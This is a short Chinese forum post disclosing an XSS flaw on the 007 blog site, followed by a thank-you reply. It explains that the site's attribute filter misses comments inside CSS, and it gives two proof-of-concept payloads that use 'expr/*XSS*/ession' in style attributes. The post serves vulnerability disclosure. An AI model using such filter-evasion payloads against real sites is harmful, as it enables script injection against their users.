007博客网XSS漏洞

啊号

虽然对于插入的html标签的属性进行过滤，包括style，但是并没有对混淆在样式中的注释部分进行检查。在修改模版时可以利用在expression中插入注释比如：expr/*XSS*/ession 造成XSS漏洞 测试代码如下
<img STYLE="xss:expr/*XSS*/ession(alert("XSS"))">
<div STYLE="xss:expr/*XSS*/ession(this.innerHTML="<h1> monyer</h1>")"></div>

唧唧歪歪

LZ    辛苦了...!学习...